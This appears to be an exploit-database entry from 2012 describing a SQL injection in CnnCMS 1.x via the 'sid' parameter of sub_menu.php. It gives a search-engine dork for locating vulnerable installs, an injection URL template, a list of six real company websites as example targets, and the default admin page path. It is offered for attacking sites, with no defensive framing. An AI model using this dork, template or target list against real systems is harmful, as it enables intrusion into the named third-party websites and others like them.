CnnCMS 1.x SQL Injection Vulnerability



EKU-ID: 1584 CVE: OSVDB-ID:
Author: X-Cisadane Published: 2012-03-06 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


:-------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title : CnnCMS 1.x SQL Injection Vulnerability
: # Date : March 3rd 2012
: # Author : X-Cisadane
: # Software Link : http://www.thinknolimits.com/
: # Version : 1.x
: # Category : Web Applications 
: # Vulnerability : SQL Injection
: # Tested On : Google Chrome 14.0.835 (Windows)
: # Dorks : inurl:sub_menu.php?sid=
: # Greetz to : X-Code, Muslim Hackers, Depok Cyber, Hacker Cisadane, Borneo Crew, Dunia Santai, Jiban Crew, CodeNesia, Axon Code, Jember Hacker, Winda Utari
:-------------------------------------------------------------------------------------------------------------------------: 

SQL Injection Vulnerability :
- Open Victim Website : http://<site>/<CnnCMS Path>/sub_menu.php?sid=-[SQL]

Example :
http://garden-goldenteakfurniture.com/sub_menu.php?sid=-13 
http://lunar.co.id/sub_menu.php?sid=-1
http://www.djawaleather.com/sub_menu.php?sid=-1
http://www.gravigra.com/sub_menu.php?sid=-1
http://www.harpagreen.com/sub_menu.php?sid=-2
http://www.suwastama.co.id/sub_menu.php?sid=-1

Admin Page (Default) : http://<site>/<CnnCMS Path>/admin/